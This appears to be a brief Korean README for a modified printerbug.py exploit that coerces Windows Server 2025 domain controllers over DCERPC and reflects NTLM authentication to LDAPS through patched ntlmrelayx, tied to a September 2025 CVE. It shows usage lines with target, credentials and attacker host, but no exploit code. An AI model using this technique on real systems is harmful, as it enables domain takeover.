
DCERPC 전용 printerbug.py 버전
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]
printerbugnew.py 192.168.1.100
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

이 반사(reflection)를 통한 익스플로잇은 "새로운" printerbug(명명된 파이프 대신 DCERPC)가 있는 W2025에서만 작동합니다.
작동시키려면 ntlmrelayx를 몇 군데 수정해야 합니다. 그 후에는 W2025 DC에서 원격으로 프린터 버그를 트리거하고 Channel Bindings가 필수인 경우에도 LDAPS를 통해 인증을 반사(reflect)할 수 있습니다.
ldaprelayclient.py:

rpcrelayserver.py
그리고 릴레이 ;)

해당 취약점은 2025년 9월 패치 화요일에 수정되었습니다: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
수정 사항은 Type 3 메시지가 비어 있는 경우에도 MIC가 항상 계산되도록 보장합니다.
이 CVE 작성자께 귀중한 힌트를 주셔서 감사합니다 :)